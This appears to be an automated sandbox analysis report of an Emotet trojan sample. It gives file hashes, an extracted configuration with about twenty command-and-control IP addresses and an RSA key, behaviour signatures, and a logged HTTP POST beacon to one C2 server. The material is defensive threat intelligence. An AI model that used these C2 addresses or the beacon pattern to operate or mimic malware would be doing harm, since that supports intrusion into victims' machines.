Analysis

  • max time kernel
    14s
  • max time network
    14s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    29-07-2020 07:20

General

  • Target

    a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486.exe

  • Size

    688KB

  • MD5

    e934d61c7f001cdb39cf4dd50c90b0cf

  • SHA1

    c8ba39222444e1171ea0ea1a5b824f8714a7902e

  • SHA256

    a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486

  • SHA512

    b2c15e7ac05408ea0fe6907dcb87870512b702b6fb00d67185b844f8acc74062b5a98cf48dfc9d39031416a72654bcd50eae3ac3bdd09e6b1dbd351b3455ce28

Score
10/10

Malware Config

Extracted

Family

emotet

C2

76.27.179.47:80

212.51.142.238:8080

189.212.199.126:443

61.19.246.238:443

162.154.38.103:80

91.211.88.52:7080

83.110.223.58:443

124.45.106.173:443

116.203.32.252:8080

109.117.53.230:443

5.196.74.210:8080

75.139.38.211:80

168.235.67.138:7080

176.111.60.55:8080

169.239.182.217:8080

74.208.45.104:8080

31.31.77.83:443

222.214.218.37:4143

37.139.21.175:8080

91.205.215.66:443

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS
3
Q0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS
4
fkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Emotet Payload 1 IoCs

    Detects Emotet payload in memory.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486.exe
    "C:\Users\Admin\AppData\Local\Temp\a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EnumeratesProcesses
    PID:3888

Network

  • flag-unknown
    POST
    http://76.27.179.47/qbroRZrv/spNDLzsW/ID1Zjir/
    a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486.exe
    Remote address:
    76.27.179.47:80
    Request
    POST /qbroRZrv/spNDLzsW/ID1Zjir/ HTTP/1.1
    Referer: http://76.27.179.47/qbroRZrv/spNDLzsW/ID1Zjir/
    Content-Type: multipart/form-data; boundary=---------------------------250154921170666
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 76.27.179.47
    Content-Length: 4484
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 29 Jul 2020 07:21:09 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 76.27.179.47:80
    http://76.27.179.47/qbroRZrv/spNDLzsW/ID1Zjir/
    http
    a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486.exe
    5.3kB
    748 B
    9
    4

    HTTP Request

    POST http://76.27.179.47/qbroRZrv/spNDLzsW/ID1Zjir/

    HTTP Response

    200
No results found

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3888-0-0x0000000000670000-0x000000000067C000-memory.dmp

    Filesize

    48KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.